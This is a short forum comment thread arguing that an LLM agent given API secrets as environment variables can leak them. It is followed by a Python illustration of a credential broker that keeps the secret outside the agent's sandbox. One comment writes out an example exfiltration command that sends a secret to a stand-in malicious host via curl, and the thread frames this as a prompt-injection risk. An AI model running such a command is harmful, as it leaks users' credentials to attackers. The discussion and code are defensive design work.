Comment by crazylogger
8 hours ago
Then you inevitably have to leak your API secret to the LLM in order for it to successfully call the APIs.
MCP is a thin tool-call auth layer that has to be there so that ChatGPT and claude.ai can "connect to your Slack", etc.
No? You can just have env vars
Setting an env var on a machine the LLM has control over is giving it the secret. When the LLM tries `echo $SECRET` or `curl https://malicious.com/api -h secret:$SECRET` (or any one of infinitely many exfiltration methods possible), how do you plan on telling these apart from normal computer use?
Prior art: https://simonwillison.net/2025/Jun/16/the-lethal-trifecta/
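Added illustration (not from this thread) of the separation the comment is pointing at: a broker process outside the model's sandbox holds the API secret and pins each tool to its own host, so the model only ever supplies a path and the credential never enters its environment. The tool name, host, header and secret value here are constructed; the transport is a stand-in for a real HTTP client.

```python
"""Credential broker: the model-facing process never holds the API secret."""

# Constructed per-tool policy: fixed destination host and where the secret goes.
TOOL_POLICY = {
    "slack": {"host": "slack.com", "header": "Authorization", "prefix": "Bearer "},
}


class CredentialBroker:
    """Runs outside the agent sandbox; exposes tool calls, never the secret."""

    def __init__(self, secrets, transport):
        self._secrets = dict(secrets)  # tool name -> secret, never returned
        self._transport = transport    # callable(url, headers) -> response text

    def call(self, tool, path, headers=None):
        policy = TOOL_POLICY.get(tool)
        if policy is None:
            raise PermissionError(f"unknown tool {tool!r}")
        # The model chooses only a path; the broker chooses the host, so a
        # model-supplied absolute URL can never carry the credential elsewhere.
        if not path.startswith("/") or "//" in path:
            raise PermissionError("path must be relative to the tool's host")
        url = f"https://{policy['host']}{path}"
        # Drop any caller-supplied auth header so it cannot override policy.
        out_headers = {k: v for k, v in (headers or {}).items()
                       if k.lower() != policy["header"].lower()}
        secret = self._secrets[tool]
        out_headers[policy["header"]] = policy["prefix"] + secret
        body = self._transport(url, out_headers)
        # If the upstream echoes the credential back, scrub it before the
        # response reaches the model.
        return body.replace(secret, "[REDACTED]")


def fake_transport(url, headers):
    """Constructed stand-in for an HTTP client; echoes what it would send."""
    return f"sent to {url} with auth={headers.get('Authorization')}"


def demo():
    # Constructed secret; in practice this is loaded only in the broker process.
    broker = CredentialBroker({"slack": "xoxb-constructed-secret"}, fake_transport)
    return broker.call("slack", "/api/chat.postMessage")
```

The model-side process talks to the broker and sees only the redacted response, so a prompt-injected `echo $SECRET` has nothing to find.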